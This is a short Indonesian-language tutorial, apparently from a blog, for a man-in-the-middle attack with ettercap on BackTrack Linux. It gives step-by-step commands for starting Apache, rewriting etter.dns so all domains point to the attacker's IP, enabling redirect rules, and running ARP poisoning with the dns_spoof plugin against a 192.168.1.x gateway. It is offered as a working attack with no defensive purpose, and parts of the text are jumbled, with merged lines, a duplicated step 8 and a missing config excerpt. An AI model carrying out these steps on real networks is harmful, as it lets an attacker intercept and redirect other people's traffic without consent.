bisa dibayangkann
lets do it.
open ettercap-ng GUI mode
1. Unified Sniffing (CTRL + U) IP -> 192.168.1.254
2. aktifkan httpd atau apache
root@bt:~# sh -c “start-apache”
# kate /var/www/index.html3. edit etter.dns
root@bt:~# cd /usr/share/ettercap/
root@bt:/usr/share/ettercap# cp etter.dns etter.dns.old
root@bt:/usr/share/ettercap# kate etter.dns
* A IP-ATTACKER4. uncomment ip table ettercap-ng
root@bt:~# kate /etc/etter.confuncomment 2 baris, redir_command_on dengan redir_command_off
sehingga menjadi:
save lalu close
5. aktifkan plugin dns_spoof di ettercap (CTRL + P).
6. scan hosts list (CTRL + S).
8. aktifkan MITM attack ARP Poisoning (Mitm -> Arp Poisoning).
8.start sniffing happy ending ;-) (CTRL + W).
root@bt:~# ettercap -i eth0 -T -q -P dns_spoof -M ARP /192.168.1.1/ //Good Luck!
http://ray16.info/~me/?p=202